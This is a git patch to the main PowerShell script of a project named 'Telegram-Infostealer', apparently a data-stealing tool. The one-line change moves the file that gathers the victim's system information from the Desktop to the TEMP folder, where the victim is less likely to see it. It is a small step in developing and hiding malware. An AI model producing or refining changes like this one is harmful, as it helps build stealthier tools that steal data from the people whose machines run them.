From b944c8077dbb3841b696a59c2aa6057763ae750e Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Mon, 12 Feb 2024 15:37:02 +0000 Subject: [PATCH] Update main.ps1 --- Telegram-Infostealer/main.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Telegram-Infostealer/main.ps1 b/Telegram-Infostealer/main.ps1 index 1e55a24..6aad1c2 100644 --- a/Telegram-Infostealer/main.ps1 +++ b/Telegram-Infostealer/main.ps1 @@ -259,7 +259,7 @@ $process ==================================================================================================================================" -$outpath = "$env:USERPROFILE/Desktop/systeminfo.txt" +$outpath = "$env:TEMP/systeminfo.txt" $contents | Out-File -FilePath $outpath -Encoding ASCII -Append $infomessage2 | Out-File -FilePath $outpath -Encoding ASCII -Append